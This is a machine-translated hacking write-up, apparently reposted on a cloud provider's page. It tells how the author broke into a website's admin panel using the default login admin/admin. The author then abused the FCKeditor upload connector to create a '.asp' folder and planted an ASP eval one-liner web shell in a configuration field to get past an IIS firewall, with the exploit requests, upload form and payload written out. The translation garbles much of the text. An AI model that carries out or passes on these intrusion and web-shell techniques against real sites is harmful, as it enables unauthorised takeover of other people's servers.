Configure file plug-in to bypass the IIS Firewall

Source: Internet
Author: User

One day the Group sent a background http://www.bkjia.com/manage/Login. asp, default management account, let help upload shell, out of curiosity, open a look
There is a data backup page, but it is replaced by a txt black page by a certain installation B.

Data backup page forced male deletion, there is upload http://www.bkjia.com/upload. asp, but the upload Trojan POST is intercepted

This station is not easy to handle. Let's check it out.

I found several sites and injected a lot, but I was charged for several MD5 cracking attacks. I had no money to crack the problem.
For the sake of simplicity, we mainly look for the default password management, there are also a few, but some can not be used in the background, some upload prompt POST packet interception

Finally found a station http://www.bkjia.com/
Background http://www.xxxxx.com/manage/login.asp
Dingfeng CMS (dfcms), admin + admin successfully logged on

Looking at the background, there are many functions, such as uploading and Database Backup (but they are automatic backups and cannot be customized paths), and basic website information management (you can consider inserting Trojans here ), there is also the Fckeditor Editor, which should be highly likely to break through.
However, normal uploads are estimated to be intercepted, and database backup cannot be used.
The configuration file may be used again after being inserted. If the insertion fails, or the insertion is successful but blocked, the entire site may be suspended.
If Fckeditor is available, try it first.
First browse the Media Directory
Http://www.xxxx.com/manage/Include/fckeditor/editor/filemanager/connectors/asp/connector. asp? Command = GetFoldersAndFiles & Type = Media & CurrentFolder = % 2F

No problem. You can browse
Access http://www.xxxx.com/manage/Inclu... Nd = CreateFolder &; Type = Media & CurrentFolder = % 2Fa. asp & NewFolderName = aaaa & uuid = 1279789845662
Create a. asp folder
Go to the Media directory and create the. asp folder.

Final Construction of the upload form


<Form id = "frmUpload" enctype = "multipart/form-data" action = "http://www.xxxx.com/manage/Include/fckeditor/editor/filemanager/connectors/asp/connector.asp? Command = FileUpload & Type = Media & CurrentFolder = % 2Fa. asp "method =" post "> Upload a new file: <br> <input type = "file" name = "NewFile" size = "50"> <br> <input id = "btnUpload" type = "submit" value = "Upload "> </form>
 
Upload a sentence to get shell
 
Http://www.xxxxx.com/uploadfiles/media/a.asp/abc.jpg
 
 

But there was a problem with the access, and the damn prompt came out again.

The current webpage is temporarily inaccessible (blocked by the firewall)

No way. What should I do? I asked people in the group, no one was looking at me.
Baidu learned that it was originally the IIS firewall of zhichuang. It seems that dish B still needs to strengthen its defense against such bypassing measures.

Find an article about how to break through the smart Innovation
When the IIS parsing vulnerability is exploited, it is regarded as a malicious script and thus caused by the wall.
Access to such a horse will be blocked: upload/1.asp/ 2_asp; jpg
Access to such a horse will not be blocked: upload/2.asp;.jpg
In this way, if the secondary upload of fckeditor can be used, it will be able to break through. Unfortunately, the secondary upload is fixed.

The last trick is to plug in the configuration file.
Since the intercepted IIS resolution is described above, it indicates that the interception is not a Trojan, or a distorted sentence may be bypassed.
I decided to use this sentence.


<% BBBB = request ("aaaa") %> <% eval (BBBB) %>
 
Add after the company address
 
 
"%> <% BBBB = request (" aaaa ") %> <% eval (BBBB) %> <%'



Save. No problem. No
The configuration file address at the bottom of the page is provided./include/vars. asp
Direct access is blank and no error is reported or blocked
Connect with a kitchen knife. Success !!!

Upload a Trojan and try it. You can upload it successfully and access it.
In this case, it seems that zichuang only blocks IIS parsing and cannot identify whether the script is a trojan.
In addition, it also filters uploaded POST data packets. Here, a modified sentence is inserted through the configuration file to successfully Bypass

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.